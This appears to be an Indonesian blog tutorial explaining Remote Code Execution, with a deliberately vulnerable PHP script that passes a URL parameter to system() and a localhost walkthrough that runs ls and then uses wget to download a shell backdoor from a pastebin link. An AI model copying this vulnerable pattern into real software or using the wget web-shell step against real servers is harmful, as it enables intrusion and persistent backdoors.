Skip to main content

Apa itu Remote Code Execution? dan Bagaimana Remote Code Execution itu bekerja?

Naufal Ardhani - Hallo gaes dah lama nih engga update artikel diblog ini karna gasempet buat nulis waktunya keambil terus sama kegiatan lain hehe , Kali ini Saya akan membahas sebuah metode yang bernama Remote Code Execution atau biasa disebut RCE.



Mungkin anda belum tau lebih jelas metode ini Apa itu Remote Code Execution? dan Bagaimana Remote Code Execution itu bekerja? silahkan simak ya ada dibawah jawabannya.



  • Apa itu Remote Code Execution?

Remote Code Execution merupakan bug dimana sang attacker mempunyai kemampuan untuk mengeksekusi perintah di mesin target, biasanya memanfaatkan kelemahan aplikasi yang dijadikan target eksploitasi, memungkinkan attacker untuk menjalankan command2 secara remote melalui url. Bug ini biasanya terdapat pada aplikasi yg mnggunakan cgi.


  • Bagaimana Remote Code Execution itu bekerja?

Script PHP Remote Code Execution sederhana :
<?php echo "RemoteCodeExecution | www.naufalardhani.com<br><br><br>"; $cmd=$_GET['action']; echo "Command : " . $cmd . "<br><br>"; system($cmd); ?>
Script diatas merupakan contoh script yang rentan pada PHP, Sesimple itu kah susunan script Remote Code Execution? yaps benar masalahnya ada di system($command),
Ini akan menjalankan fungsi yang berhubungan dengan sistem.

Disini saya sudah mengupload script Remote Code Execution ke localhost dengan nama tools.php sebagai contoh target dan saya akan mempraktekan bagaimana sang Attacker melakukan Remote Code Execution pada sistem,

  1. Saya membuka link http://localhost:8888/tools.php ( contoh target )
  2. Dan saya menambahkan ?action= setelah http://localhost:8888/tools.php untuk melakukan Remote Code Execution, jadi seperti berikut linknya http://localhost:8888/tools.php?action= dan saya mencoba menjalankan command ls untuk melihat isi directory, http://localhost:8888/tools.php?action=ls dan terdapat 1 folder dan 3 file.
  3. Lalu sang Attacker mencoba memanggil Shell Backdoor RESET dengan command wget, seperti ini commandnya "wget linkshell -O namafile.php", http://localhost:8888/tools.php?action=wget https://pastebin.com/raw/**** -O reset.php
  4. lalu kita cek Shellnya, http://localhost:8888/reset.php
Nahh sudah terupload shellnya :)

Sampai disini saja artikel kali ini semoga bermanfaat bagi kalian semua dan jika ada kesalahan dalam penulisan artikel ini mohon di maklumi karna saya sebagai penulis juga masih belajar.

Request artikel / Mengoreksi kesalahan dalam artikel? silahkan isi di kolom komentar.
Labels:

Comments

Post a Comment

Popular posts from this blog

Benner Online Shop CDR / Toko Online Elegan CDR 100% Free

Benner Online Shop/ Toko Online Elegan 100% Free - Bagi anda yang memiliki toko online/online shop dan bingung untuk membuat bennernya, disini kami sajikan contoh benner online shop. benner online shope yang kami bagikan ini adalah benner yang di desain tim desainer kami untuk anda. contoh ini dapat menjadi referensi. dan jika anda membutuhkan file CDRnya anda dapat mengunduhnya pada link yang admin buat di akhir artikel ini. setelah anda mengunduh file CDRnya silahkan di edit sesuai nama online shop anda dengan menggunkan CorelDraw. Sesuai dengan judul yaitu Benner Online Shop/ Toko Online Elegan CDR 100% Free bahwa kami membagikannya secara gratis. jadi bagi yang berminat silahkan di download. berikut adalah contoh benner online shop yang kami maksud. Contoh 1 benner online Shop Contoh 2 benner online Shop    Contoh 3 benner online Shop Itulah contoh benner online shop yang dapat kami bagikan, kami berharap contoh diatas dapat mewakili kebutuhan anda. jika anda ingin re...
Post a Comment
Read more

Memperbaiki Error Page Contains Property "BlogId" And "postID" Is Not Part Of Schema

Memperbaiki Error Page Contains Property "BlogId" And "postID" Is Not Part Of Schema Written by Muhamad Hamdan on Wen March 5th 2014 Assalamu'Alaikum Sahabat Semua,Dua Minggu yang lalu kita pernah Membikin Artikel bagaimana cara Memperbaiki Missing required field "updated" Dan hCard "author" Mereka yang telah melihat artikel tadi pasti sudah valid kalau Dia mengikuti petunjuknya,Tetapi walaupun itu sudah valid untuk menggunakan rich snippets untuk google webmasters tools, Sebagian besar suka menemukan Error Page Contains Property "BlogId" And "postID" Is Not Part Of Schema di karenakan dari kesalahan property yang bukan schema markup. Nah sekarang untuk melanjutkan dengan cara Memperbaiki Error Page Contains Property "BlogId" And "postID" Is Not Part Of Schema Anda perlu bantuan d...
Post a Comment
Read more

Cara mendapatkan Dollar dari situs Survey Mobrog.com

Hallo Brada, Diartikel ke tiga puluh satu ini, Saya akan memberikan Tutorial Cara bermain Mobrog hingga mendapatkan Dollar. Mobrog adalah situs Survey Online yang bisa menghasilkan Uang berupa Dollar secara gratis dan mudah. Mobrog merupakan layanan yang disediakan oleh perusahaan riset pasar SPLENDID RESEARCH GmbH dari Jerman. Situs ini sudah termasuk situs Survey online terpercaya, sudah banyak orang yang pernah Withdraw dari Mobrog. Survey ini sudah berada diseluruh dunia, termasuk Indonesia. Cara mendapatkan Dollar di Mobrog Sebelumnya Anda harus menyiapkan Smartphone/PC, Koneksi Internet, Email aktif, dan Wallet PayPal. Jika sudah menyiapkan alat dan bahan yang diperlukan diatas, silahkan melanjutkan membaca Tutorial ini. 1. Pertama, silahkan Anda membuat akun terlebih dahulu disini . 2. Kedua, lengkapi Formulir pendaftaran yang diminta. Isilah Formulir pendaftaran dengan benar sesuai data Anda, jika sudah klik " i agree to... " dan pilih " Register ". 3. Ketig...
Post a Comment
Read more